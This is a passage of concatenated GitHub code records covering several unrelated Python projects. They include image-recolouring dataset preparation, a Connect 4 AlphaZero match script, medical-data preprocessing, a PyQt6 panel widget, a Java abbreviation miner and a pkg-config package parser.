print('Soft encoded training done')\n #\n validation_paths = []\n i = 0\n with open('./validation_ids_tiny.pickle', 'rb') as fp:\n validation_ids = pickle.load(fp)\n print('There are currently', len(validation_ids), 'images in the validation set')\n for path in validation_ids:\n if i % 1000 == 
0:\n print('Saved', i, 'documents')\n i += 1\n namepath = 'val/' + path[37:-5]\n # new_path = save_input_output(path, namepath)\n new_path = '../data/npz-tiny-imagenet/' + namepath + '_intput_output.npz'\n validation_ids.append(new_path)\n\n with open('../validation_ids_npz.pickle', 'wb') as fp:\n pickle.dump(validation_paths, fp)\n # print('Soft encoded validation ids done!')\n\n test_paths = []\n i = 0\n with open('./test_ids_tiny.pickle', 'rb') as fp:\n test_ids = pickle.load(fp)\n print('There are currently', len(test_ids), 'images in the test set')\n for path in test_ids:\n if i % 1000 == 0:\n print('Saved', i, 'documents')\n i += 1\n name_path = 'test/' + path[38:-5]\n new_path = save_input_output(path, name_path)\n test_paths.append(new_path)\n #\n with open('../test_ids_npz.pickle', 'wb') as fp:\n pickle.dump(test_paths, fp)\n\n print('Soft encoded test done!')\n\n\n###############################################################################\n# Create dataset for the 2 class experiments\n# This experiment will consist in training 2 classes, each with the custom weights,\n# and with the other's custom weights\n#\ndef save_input_output_2classes(path, newpath):\n image = image_util.read_image(path)\n lab = image_util.convert_rgb_to_lab(image)\n se = image_util.soft_encode_lab_img(lab)\n\n new_path = newpath\n np.savez_compressed(new_path, input=lab, output=se)\n\ndef create_twoclasses_id():\n classes = ['n01443537', 'n02099712']\n root_dir = '../data/tiny-imagenet-200/train/'\n\n train_ids = {}\n validation_ids = {}\n\n for cur_class in classes:\n dir_path = root_dir + cur_class + '/images/'\n train_ids[cur_class] = []\n for subdir, dir, files in os.walk(dir_path):\n for file in files:\n path = os.path.join(dir_path, file).replace('\\\\', '/')\n if path.split('.')[-1] == \"JPEG\" and not is_grey_image(path):\n train_ids[cur_class].append(path)\n\n print('Number of training ids for fish', len(train_ids[classes[0]]))\n with open('./saved_objects/train_ids_fish_uncompressed.pickle', 'wb') as fp:\n pickle.dump(train_ids[classes[0]], fp)\n print('Number of training ids for dog', len(train_ids[classes[1]]))\n with open('./saved_objects/train_ids_dog_uncompressed.pickle', 'wb') as fp:\n pickle.dump(train_ids[classes[1]], fp)\n\n\n val_keys = load_validation_keys()\n root_dir = \"../data/tiny-imagenet-200/val/images/\"\n\n validation_ids[classes[0]] = []\n validation_ids[classes[1]] = []\n for image in val_keys:\n if val_keys[image] in classes[0]:\n path = os.path.join(root_dir, image).replace('\\\\', '/')\n validation_ids[classes[0]].append(path)\n elif val_keys[image] in classes[1]:\n path = os.path.join(root_dir, image).replace('\\\\', '/')\n validation_ids[classes[1]].append(path)\n\n print('Number of validation ids for fish', len(validation_ids[classes[0]]))\n with open('./saved_objects/validation_ids_fish_uncompressed.pickle', 'wb') as fp:\n pickle.dump(validation_ids[classes[0]], fp)\n print('Number of validation ids for dog', len(validation_ids[classes[1]]))\n with open('./saved_objects/validation_ids_dog_uncompressed.pickle', 'wb') as fp:\n pickle.dump(validation_ids[classes[1]], fp)\n\ndef save_twoclasses_npz():\n train_dir = './saved_objects/train_ids_'\n validation_dir = './saved_objects/validation_ids_'\n output_dir = '../data/2classes/'\n classes = ['fish', 'dog']\n\n training_ids_npz = {}\n validation_ids_npz = {}\n\n train_output_dir = output_dir + 'train/'\n for i in range(len(classes)):\n path_in = train_dir + classes[i] + '_uncompressed.pickle'\n 
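# start a fresh path list for this class; each raw image is re-saved below as a compressed (cielab, soft-encoding) .npz pair\n        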
training_ids_npz[classes[i]] = []\n        with open(path_in, 'rb') as fp:\n            ids = pickle.load(fp)\n\n        for image in ids:\n            newname = image.split('/')[-1].split('.')[0]\n            newpath = train_output_dir + newname + '.npz'\n            training_ids_npz[classes[i]].append(newpath)\n            save_input_output_2classes(image, newpath)\n\n        direc = train_dir + classes[i] + '.pickle'\n        print(direc, 'has length', len(training_ids_npz[classes[i]]))\n        with open(direc, 'wb') as fp:\n            pickle.dump(training_ids_npz[classes[i]], fp)\n\n\n    validation_output_dir = output_dir + 'val/'\n    for i in range(len(classes)):\n        path_in = validation_dir + classes[i] + '_uncompressed.pickle'\n        validation_ids_npz[classes[i]] = []\n        with open(path_in, 'rb') as fp:\n            ids = pickle.load(fp)\n\n        for image in ids:\n            newname = image.split('/')[-1].split('.')[0]\n            newpath = validation_output_dir + newname + '.npz'\n            validation_ids_npz[classes[i]].append(newpath)\n            save_input_output_2classes(image, newpath)\n\n        direc = validation_dir + classes[i] + '.pickle'\n        print(direc, 'has length', len(validation_ids_npz[classes[i]]))\n        with open(direc, 'wb') as fp:\n            pickle.dump(validation_ids_npz[classes[i]], fp)\n\n\ndef create_twoclasses_dataset():\n    # create_twoclasses_id()\n    save_twoclasses_npz()\n\n###############################################################################\n# Test loading functions\n\n\ndef test_loading():\n    from keras_util import load_compressed_files\n\n    cielab, se = load_compressed_files('../data/npz-tiny-imagenet/train/n01641577_0_intput_output.npz')\n\n    print('Cielab', cielab.shape)\n    print('Soft encoding', se.shape)\n\n    cielab = image_util.convert_lab_to_rgb(cielab)\n    image_util.plot_image(cielab)\n\n\n################################################################################\n# Create pickled files used by DataGenerator when this file is run directly\n\nif __name__ == '__main__':\n    # create_twoclasses_dataset()\n    create_all_tf_records()","repo_name":"nikvaessen/recolor-tiny-imagenet","sub_path":"recolor/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":20181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"38018553887","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 28 17:40:59 2023\r\n\r\nThis script makes two Connect 4 agents play against each other for k games. \r\nThe relevant statistics are then printed.\r\n\r\n@author: Ninniri Matteo. 
Student ID: 543873\r\n\"\"\"\r\n\r\nfrom Board import ConnectFourBoard\r\nfrom AlphaZeroAgent import AlphaZeroAgent\r\nfrom Net import Net\r\nfrom Game import Game\r\nimport torch\r\n\r\n\r\n\r\nnn1 = Net(x_sz = 6,\r\n y_sz = 7,\r\n n_ch = 2,\r\n k_sz = 3,\r\n n_resnet = 8,\r\n common_ch = 128,\r\n p_ch = 128,\r\n n_moves = 7)\r\nnn1.LoadModel('Connect4_final.pth')\r\n\r\nnn2 = Net(x_sz = 6,\r\n y_sz = 7,\r\n n_ch = 2,\r\n k_sz = 3,\r\n n_resnet = 8,\r\n common_ch = 128,\r\n p_ch = 128,\r\n n_moves = 7)\r\nnn2.LoadModel('Connect4_midpoint.pth')\r\n\r\nk = 10\r\nwon_as_player1 = 0\r\ndrawn_as_player1 = 0\r\nlost_as_player1 = 0\r\nwon_as_player2 = 0\r\ndrawn_as_player2 = 0\r\nlost_as_player2 = 0\r\nfor i in range(k):\r\n torch.manual_seed(i)\r\n \r\n agent1 = AlphaZeroAgent(nn1, turns_before_ann = 6, n_iters_per_move = 300, epsilon = .1)\r\n agent2 = AlphaZeroAgent(nn2, turns_before_ann = 6, n_iters_per_move = 300, epsilon = .1)\r\n b = ConnectFourBoard()\r\n g = Game()\r\n result = g.Play(b, agent1, agent2, verbose = 0)\r\n \r\n if(result == 0):\r\n drawn_as_player1 += 1\r\n elif(result == 1):\r\n won_as_player1 += 1\r\n else:\r\n lost_as_player1 += 1\r\n \r\n ###########################################################################\r\n agent1 = AlphaZeroAgent(nn1, turns_before_ann = 6, n_iters_per_move = 300, epsilon = .1)\r\n agent2 = AlphaZeroAgent(nn2, turns_before_ann = 6, n_iters_per_move = 300, epsilon = .1)\r\n b = ConnectFourBoard()\r\n g = Game()\r\n result = g.Play(b, agent2, agent1, verbose = 0)\r\n \r\n if(result == 0):\r\n drawn_as_player2 += 1\r\n elif(result == -1):\r\n won_as_player2 += 1\r\n else:\r\n lost_as_player2 += 1\r\n \r\n print(\"Iteration\", (i+1))\r\n print(\"Percentage of games agent 1 won AS PLAYER 1:\", \r\n won_as_player1/(i+1), \", drawn =\", drawn_as_player1/(i+1), \", lost =\", lost_as_player1/(i+1))\r\n print(\"Percentage of games agent 1 won AS PLAYER 2:\", \r\n won_as_player2/(i+1), \", drawn =\", drawn_as_player2/(i+1), \", lost =\", lost_as_player2/(i+1))\r\n print(\"======================================================================\")\r\n \r\nprint(\"======================================================================\")\r\nprint(\"Final score:\") \r\nprint(\"Percentage of games agent 1 won AS PLAYER 1:\", \r\n won_as_player1/k, \", drawn =\", drawn_as_player1/k, \", lost =\", lost_as_player1/k)\r\nprint(\"Percentage of games agent 1 won AS PLAYER 2:\", \r\n won_as_player2/k, \", drawn =\", drawn_as_player2/k, \", lost =\", lost_as_player2/k)","repo_name":"Asduffo/AlphaZeroUni","sub_path":"PitConnect4Agents.py","file_name":"PitConnect4Agents.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36883131792","text":"import os\nimport pandas as pd\nimport numpy as np\nimport yaml\nfrom get_data import read_params, get_data\nfrom sklearn.impute import KNNImputer\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.utils import resample\nfrom sklearn.utils import shuffle\nfrom imblearn.over_sampling import SMOTENC, RandomOverSampler, KMeansSMOTE\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n\ndef check_missing_val(df, config_path):\n config = read_params(config_path)\n null_data_path = config['data_source']['null_dir']\n val = []\n col_ = []\n for column in df.columns:\n count = df[column][df[column]==\"?\"].count()\n if count > 0:\n val.append(count)\n col_.append(column)\n data = {} \n for key in col_:\n for value in val:\n 
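# pair the column with the next recorded count, consuming it from val so it is not reused\n            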
data[key]=value\n val.remove(value)\n break\n null = pd.DataFrame(data, index= range(0,1))\n if null.shape[1]>0:\n null.to_csv(null_data_path, sep=\",\", index=False)\n\n\n \n\ndef ColsToDrop(df, cols):\n df.drop(columns=cols, axis=1, inplace=True)\n return df\n \n\ndef replaceMissingValWithNAN(df):\n for col in df.columns:\n count = df[col].loc[df[col]=='?'].count()\n if count > 0:\n df[col] = df[col].replace(\"?\", np.nan)\n return df\n\ndef MapCategoricalVal(df):\n for col in df.columns:\n if ((df[col].value_counts()).shape)[0] ==2:\n if 'M' in (df[col].unique()):\n df[col] = df[col].map({'F':0, 'M':1})\n else:\n df[col] = df[col].map({'f':0, 't':1})\n return df\n\n\ndef MissingValImputer(df):\n imputer = KNNImputer(n_neighbors=3, weights=\"uniform\", missing_values=np.nan)\n\n new_array = imputer.fit_transform(df)\n\n df = pd.DataFrame(data=np.round(new_array), columns=df.columns)\n \n return df\n \ndef smoteImbalanceAndSplit(df, config_path):\n config = read_params(config_path)\n bal_data_path = config['data_source']['balanced_sampled_data']\n good_data_path = config['load_data']['good_data_csv']\n\n X = df.drop('Class', axis=1)\n y= df['Class']\n\n ros = RandomOverSampler()\n x_sampled, y_sampled = ros.fit_resample(X,y)\n\n (y_sampled.value_counts()).to_csv(bal_data_path, sep=\",\")\n\n processed_data = pd.concat([x_sampled, y_sampled], axis=1, sort=False)\n\n\n processed_data = shuffle(processed_data).reset_index(drop=True)\n\n processed_data.to_csv(good_data_path, sep=\",\", index=False)\n\n\n\n return processed_data\n \n \n\n","repo_name":"Gntlgenius/Thyroid_detection","sub_path":"src/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25872601331","text":"def dfs(ind):\n global N,result\n visited = [True]*(N+1)\n stack = [(ind,0)]\n while stack:\n cu_ind,distance = stack.pop()\n if not visited[cu_ind]:\n continue\n visited[cu_ind] = False\n if distance > result:\n result = distance\n for next_ind in graph[cu_ind]:\n if visited[next_ind]:\n stack.append((next_ind,distance+graph[cu_ind][next_ind]))\n\nN = int(input())\ngraph = [{} for _ in range(N+1)]\nparents = [0]*(N+1)\nfor _ in range(N-1):\n A,B,C = map(int,input().split())\n graph[A][B] = C\n graph[B][A] = C\n parents[A] += 1\n\nleef_nodes = []\n\nfor ind in range(1,N+1):\n if not parents[ind]:\n leef_nodes.append(ind)\n\nresult = 0\n\nfor ind in leef_nodes:\n dfs(ind)\nprint(result)","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/1967_트리의_지름_version1(Fail).py","file_name":"1967_트리의_지름_version1(Fail).py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32182574674","text":"from PyQt6.QtGui import *\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtWidgets import QWidget, QSizePolicy, QLabel, QPushButton, QGridLayout, QVBoxLayout, QHBoxLayout, QCheckBox, QSpacerItem, QTabWidget\nfrom .mylineedit import MyLineEdit\n\nfrom misc import setup_size_policy\nimport random\n\n\nclass DataPanel(QTabWidget):\n\n def _QLabel(self, text, **kwargs):\n name = \"qlabel_\" + \"\".join([random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(10)])\n qlabel = QLabel(text, **kwargs)\n setattr(self, name, qlabel)\n\n return qlabel\n\n def initialize(self, matrices):\n\n for i in range(self.i):\n self.removeTab(0)\n\n self.i = 0\n\n for i, m in enumerate(matrices):\n 
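# one tab per loaded matrix, labelled with its source file name\n            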
self.addTab(self.create_panels(m, i), m.get_filename())\n\n def set_range(self, index, x0=None, x1=None, y0=None, y1=None):\n assert type(index) is int\n\n if y0 is not None:\n getattr(self, f'txb_t0{index}').setText(f'{y0:.4g}')\n if y1 is not None:\n getattr(self, f'txb_t1{index}').setText(f'{y1:.4g}')\n if x0 is not None:\n getattr(self, f'txb_w0{index}').setText(f'{x0:.4g}')\n if x1 is not None:\n getattr(self, f'txb_w1{index}').setText(f'{x1:.4g}')\n\n def create_panels(self, matrix, index):\n\n main_widget = QWidget()\n main_layout = QVBoxLayout()\n main_widget.setLayout(main_layout)\n\n grid = QGridLayout()\n main_layout.addLayout(grid)\n\n grid.addWidget(self._QLabel(\"Matrix size:\"), 0, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(self._QLabel(\"Cropped matrix size:\"), 1, 0, Qt.AlignmentFlag.AlignLeft, 1)\n\n lbl_matrix_size = QLabel(f\"{matrix.D.shape[0]} x {matrix.D.shape[1]}\")\n lbl_cr_matrix_size = QLabel(f\"{matrix.D.shape[0]} x {matrix.D.shape[1]}\")\n lbl_visible_area_msize = QLabel(\"\")\n\n grid.addWidget(lbl_matrix_size, 0, 1, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(lbl_cr_matrix_size, 1, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid.addWidget(self._QLabel(\"Visible area:\"), 2, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(lbl_visible_area_msize, 2, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n txb_t0 = MyLineEdit()\n txb_t1 = MyLineEdit()\n txb_w0 = MyLineEdit()\n txb_w1 = MyLineEdit()\n\n grid.addWidget(self._QLabel(\"y0\"), 3, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(self._QLabel(\"y1\"), 3, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid.addWidget(txb_t0, 4, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(txb_t1, 4, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid.addWidget(self._QLabel(\"x0\"), 5, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(self._QLabel(\"x1\"), 5, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n grid.addWidget(txb_w0, 6, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid.addWidget(txb_w1, 6, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n # # self.btn_crop_matrix = QPushButton(\"Crop to visible area\")\n # # self.btn_restore_matrix = QPushButton(\"Restore original matrix\")\n #\n # hlayout_crop = QHBoxLayout()\n # # hlayout_crop.addWidget(self.btn_crop_matrix)\n # # hlayout_crop.addWidget(self.btn_restore_matrix)\n # self.main_layout.addLayout(hlayout_crop)\n #\n # # self.btn_crop_matrix.clicked.connect(self.btn_crop_matrix_clicked)\n # # self.btn_restore_matrix.clicked.connect(self.btn_restore_matrix_clicked)\n\n txb_n_spectra = MyLineEdit()\n btn_redraw_spectra = QPushButton(\"Redraw\")\n\n hlayout = QHBoxLayout()\n hlayout.addWidget(self._QLabel(\"Number of spectra shown:\"))\n hlayout.addWidget(txb_n_spectra)\n hlayout.addWidget(btn_redraw_spectra)\n main_layout.addLayout(hlayout)\n\n cb_SVD_filter = QCheckBox(\"SVD filter:\")\n txb_SVD_filter = MyLineEdit()\n\n hlayout2 = QHBoxLayout()\n hlayout2.addWidget(cb_SVD_filter)\n hlayout2.addWidget(txb_SVD_filter)\n main_layout.addLayout(hlayout2)\n\n cb_ICA_filter = QCheckBox(\"ICA subtract filter:\")\n txb_ICA_filter = MyLineEdit()\n\n hlayout3 = QHBoxLayout()\n hlayout3.addWidget(cb_ICA_filter)\n hlayout3.addWidget(txb_ICA_filter)\n main_layout.addLayout(hlayout3)\n\n grid2 = QGridLayout()\n main_layout.addLayout(grid2)\n\n grid2.addWidget(self._QLabel(\"Heat map levels:\"), 0, 0, Qt.AlignmentFlag.AlignLeft, 1)\n\n txb_z0 = MyLineEdit()\n txb_z1 = MyLineEdit()\n\n grid2.addWidget(self._QLabel(\"z0\"), 1, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid2.addWidget(self._QLabel(\"z1\"), 1, 1, 
Qt.AlignmentFlag.AlignLeft, 1)\n\n grid2.addWidget(txb_z0, 2, 0, Qt.AlignmentFlag.AlignLeft, 1)\n grid2.addWidget(txb_z1, 2, 1, Qt.AlignmentFlag.AlignLeft, 1)\n\n # self.btn_center_levels = QPushButton(\"Center levels\")\n # self.main_layout.addWidget(self.btn_center_levels)\n\n cb_show_chirp_points = QCheckBox(\"Show chirp points\")\n btn_fit_chirp_params = QPushButton(\"Fit chirp params\")\n\n scp_name = f\"cb_show_cp_{index}\"\n fcp_name = f\"btn_fit_cp_{index}\"\n\n setattr(self, scp_name, cb_show_chirp_points)\n setattr(self, fcp_name, btn_fit_chirp_params)\n\n main_layout.addWidget(self._QLabel(\"For femto fitting:\"))\n\n hlayout2 = QHBoxLayout()\n hlayout2.addWidget(cb_show_chirp_points)\n hlayout2.addWidget(btn_fit_chirp_params)\n main_layout.addLayout(hlayout2)\n\n spacerItem = QSpacerItem(20, 40, QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Expanding)\n main_layout.addItem(spacerItem)\n\n for key, attr in locals().items():\n if key == 'self' or key == 'matrix':\n continue\n\n setattr(self, f'{key}{self.i}', attr)\n\n self.i += 1\n return main_widget\n\n def __init__(self, parent=None):\n super(DataPanel, self).__init__(parent=parent)\n\n self.i = 0 # index of added attributes\n\n # self.main_layout = QVBoxLayout()\n # self.main_layout.addWidget(self.tab_widget)\n #\n # self.setLayout(self.main_layout)\n\n # self.grid = QGridLayout()\n # self.main_layout.addLayout(self.grid)\n #\n # self.grid.addWidget(self._QLabel(\"Matrix size:\"), 0, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self._QLabel(\"Cropped matrix size:\"), 1, 0, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.lbl_matrix_size = QLabel(\"\")\n # self.lbl_cr_matrix_size = QLabel(\"\")\n # self.lbl_visible_area_msize = QLabel(\"\")\n #\n # self.grid.addWidget(self.lbl_matrix_size, 0, 1, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self.lbl_cr_matrix_size, 1, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid.addWidget(self._QLabel(\"Visible area:\"), 2, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self.lbl_visible_area_msize, 2, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.txb_t0 = MyLineEdit()\n # self.txb_t1 = MyLineEdit()\n # self.txb_w0 = MyLineEdit()\n # self.txb_w1 = MyLineEdit()\n #\n # self.grid.addWidget(self._QLabel(\"y0\"), 3, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self._QLabel(\"y1\"), 3, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid.addWidget(self.txb_t0, 4, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self.txb_t1, 4, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid.addWidget(self._QLabel(\"x0\"), 5, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self._QLabel(\"x1\"), 5, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid.addWidget(self.txb_w0, 6, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid.addWidget(self.txb_w1, 6, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # # self.btn_crop_matrix = QPushButton(\"Crop to visible area\")\n # # self.btn_restore_matrix = QPushButton(\"Restore original matrix\")\n #\n # hlayout_crop = QHBoxLayout()\n # # hlayout_crop.addWidget(self.btn_crop_matrix)\n # # hlayout_crop.addWidget(self.btn_restore_matrix)\n # self.main_layout.addLayout(hlayout_crop)\n #\n # # self.btn_crop_matrix.clicked.connect(self.btn_crop_matrix_clicked)\n # # self.btn_restore_matrix.clicked.connect(self.btn_restore_matrix_clicked)\n #\n # self.txb_n_spectra = MyLineEdit()\n # self.btn_redraw_spectra = QPushButton(\"Redraw\")\n #\n # hlayout = QHBoxLayout()\n # hlayout.addWidget(self._QLabel(\"Number of spectra 
shown:\"))\n # hlayout.addWidget(self.txb_n_spectra)\n # hlayout.addWidget(self.btn_redraw_spectra)\n # self.main_layout.addLayout(hlayout)\n #\n # self.cb_SVD_filter = QCheckBox(\"SVD filter:\")\n # self.txb_SVD_filter = MyLineEdit()\n #\n # hlayout2 = QHBoxLayout()\n # hlayout2.addWidget(self.cb_SVD_filter)\n # hlayout2.addWidget(self.txb_SVD_filter)\n # self.main_layout.addLayout(hlayout2)\n #\n # self.cb_ICA_filter = QCheckBox(\"ICA subtract filter:\")\n # self.txb_ICA_filter = MyLineEdit()\n #\n # hlayout3 = QHBoxLayout()\n # hlayout3.addWidget(self.cb_ICA_filter)\n # hlayout3.addWidget(self.txb_ICA_filter)\n # self.main_layout.addLayout(hlayout3)\n #\n # self.grid2 = QGridLayout()\n # self.main_layout.addLayout(self.grid2)\n #\n # self.grid2.addWidget(self._QLabel(\"Heat map levels:\"), 0, 0, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.txb_z0 = MyLineEdit()\n # self.txb_z1 = MyLineEdit()\n #\n # self.grid2.addWidget(self._QLabel(\"z0\"), 1, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid2.addWidget(self._QLabel(\"z1\"), 1, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # self.grid2.addWidget(self.txb_z0, 2, 0, Qt.AlignmentFlag.AlignLeft, 1)\n # self.grid2.addWidget(self.txb_z1, 2, 1, Qt.AlignmentFlag.AlignLeft, 1)\n #\n # # self.btn_center_levels = QPushButton(\"Center levels\")\n # # self.main_layout.addWidget(self.btn_center_levels)\n #\n # self.cb_show_chirp_points = QCheckBox(\"Show chirp points\")\n # self.btn_fit_chirp_params = QPushButton(\"Fit chirp params\")\n #\n # self.main_layout.addWidget(self._QLabel(\"For femto fitting:\"))\n #\n # hlayout2 = QHBoxLayout()\n # hlayout2.addWidget(self.cb_show_chirp_points)\n # hlayout2.addWidget(self.btn_fit_chirp_params)\n # self.main_layout.addLayout(hlayout2)\n #\n # spacerItem = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n # self.main_layout.addItem(spacerItem)\n\n setup_size_policy(self)\n\n # self.main_layout.addStretch(1)\n\n def btn_crop_matrix_clicked(self):\n pass\n\n def btn_restore_matrix_clicked(self):\n pass\n","repo_name":"dmadea/Transient-Spectra-Analyzer","sub_path":"Widgets/datapanel.py","file_name":"datapanel.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"19128873545","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport itertools\n\nimport sys\n\nfrom javalang.tokenizer import Identifier, tokenize\nfrom ..utils.pair_checker import PairChecker\nfrom ..utils.code_cleaner import CodeCleaner\nfrom ..utils.delimiter import Delimiter\nfrom .abbr_base import AbbrBase\n\nfrom javalang.parse import parse\nfrom javalang.tree import VariableDeclaration, FieldDeclaration, MethodInvocation\n\n# from nltk.corpus import words\n\n\n# modify the default recursion limit set by python\nsys.setrecursionlimit(10 ** 6)\n\n\nclass AbbrMiner:\n def __init__(self):\n self.pair_checker = PairChecker.get_inst()\n # self.english_vocab = set(w.lower() for w in words.words())\n\n def process_code(self, code):\n identifiers = self.tokenize_code_based_on_ast(code)\n print('*' * 10 + 'split identifiers info' + '*' * 10)\n print(identifiers)\n pairs = set()\n for term1, term2 in itertools.combinations(identifiers, 2):\n long_term, short_term = (term1, term2) if len(term1) >= len(term2) else (term2, term1)\n if self.pair_checker.check_abbr(short_term, long_term) \\\n and not self.pair_checker.check_collocation(short_term, long_term):\n pairs.add((short_term, long_term))\n return pairs\n\n def mine(self, codes, i) -> 
AbbrBase:\n        abbr_base = AbbrBase()\n        count = 0\n        for code in codes:\n            count += 1\n            if count % 500 == 0:\n                print('[%d]finished %d codes...' % (i, count))\n            try:\n                pairs = self.process_code(code)\n                for pair in pairs:\n                    abbr_base.add_pair(abbr=pair[0], full=pair[1])\n            except Exception:\n                print('[%d]process code %d error' % (i, count))\n        return abbr_base\n\n    def tokenize_code(self, code) -> set:\n        identifiers = set()\n        tokens = tokenize(code)\n        tokens = CodeCleaner.clean_annotation(list(tokens))\n        for token in tokens:\n            if isinstance(token, Identifier):\n                for split_value in Delimiter.split_camel_strict(token.value).split():\n                    identifiers.add(split_value)\n        return identifiers\n\n    def tokenize_code_based_on_ast(self, code) -> set:\n        identifiers = set()\n        tokens = set()\n        node_types = (VariableDeclaration, FieldDeclaration, MethodInvocation)\n        cu = parse(code)\n        for path, node in cu:\n            if isinstance(node, node_types):\n                for token in node.tokens():\n                    if isinstance(token, Identifier):\n                        tokens.add(token.value)\n                        for split_value in Delimiter.split_camel_strict(token.value).split():\n                            identifiers.add(split_value)\n        print('*'*10 + 'identifiers info' + '*'*10)\n        print(tokens)\n        return identifiers\n","repo_name":"TerryMXJ/Abbr_Pair","sub_path":"semantictagging/miner/abbr_miner.py","file_name":"abbr_miner.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"71588118225","text":"__version__ = \"$Revision: $\"\n# $Source$\n\nfrom copy import deepcopy\nfrom os.path import abspath, dirname, join, normpath\nimport re\nimport shlex\nimport sys\n\nfrom pykg_config.errorprinter import ErrorPrinter\nfrom pykg_config.exceptions import ParseError\nfrom pykg_config.pcfile import read_pc_file\nfrom pykg_config.substitute import substitute\nfrom pykg_config.props import *\nfrom pykg_config.options import Options\nfrom pykg_config.packagespeclist import parse_package_spec_list\nfrom pykg_config.version import BadVersionFormatError, Version\n\n##############################################################################\n# Package class\n\nclass Package:\n    \"\"\"This class stores the information gleaned from a pkg-config\n    file, allowing quick access to it.\n\n    \"\"\"\n\n    def __init__(self, filename=None, globals={}):\n        # Different platforms may use different flags and extensions\n        if sys.platform == 'win32' and Options().get_option('use_msvc_syntax'):\n            self.lib_suffix = '.lib'\n        else:\n            self.lib_suffix = ''\n\n        # Parse a file if one was given\n        if filename is not None:\n            self.load_from_pc_file(filename, globals)\n            if filename.endswith('-uninstalled'):\n                self.uninstalled = True\n            else:\n                self.uninstalled = False\n        else:\n            self.clear()\n\n    def __str__(self):\n        result = self.filename + '\\nProperties:\\n'\n        for key in self.properties:\n            if key == 'requires' or key == 'requires.private' or \\\n                    key == 'conflicts':\n                result += '%s:\\t%s\\n' % \\\n                    (key, [str(a) for a in self.properties[key]])\n            else:\n                result += '%s:\\t%s\\n' % (key, self.properties[key])\n        result += 'Variables:\\n'\n        for key in self.variables:\n            result += '%s:\\t%s\\n' % (key, self.variables[key])\n        return result\n\n    @property\n    def variables(self):\n        \"\"\"Variables used by the package properties.\"\"\"\n        return self._vars\n\n    @variables.setter\n    def variables(self, new_vars):\n        self._vars = new_vars\n\n    @property\n    def properties(self):\n        \"\"\"Properties of the package.\"\"\"\n        return self._props\n\n    @properties.setter\n    def properties(self, 
new_props):\n        self._props = new_props\n\n    @property\n    def filename(self):\n        \"\"\"File name of the pkg-config file this package was loaded from.\"\"\"\n        return self._filename\n\n    def clear(self):\n        \"\"\"Clear all package data.\"\"\"\n        self._props = deepcopy(empty_processed_props)\n        self._vars = {}\n        self.raw_props = deepcopy(empty_raw_props)\n        self.raw_vars = {}\n        self.filename = ''\n\n    def get_raw_property(self, prop):\n        \"\"\"Get a property value in its raw format, as it appears in the\n        file.\n\n        \"\"\"\n        return self.raw_props[prop]\n\n    def get_raw_variable(self, var):\n        \"\"\"Get a variable in its raw format, as it appears in the file.\"\"\"\n        return self.raw_vars[var]\n\n    def sanity_check(self):\n        return True\n\n    def load_from_pc_file(self, filename, global_variables):\n        \"\"\"Load data from a package config file and process it.\"\"\"\n        self.raw_vars, self.variables, \\\n            self.raw_props = read_pc_file(filename, global_variables)\n        self._filename = filename\n        self._process_props(global_variables)\n\n    def _process_props(self, global_variables):\n        # Processing of file data\n        props = self.raw_props\n\n        # May need to reset the prefix variable\n        if sys.platform == 'win32' and \\\n                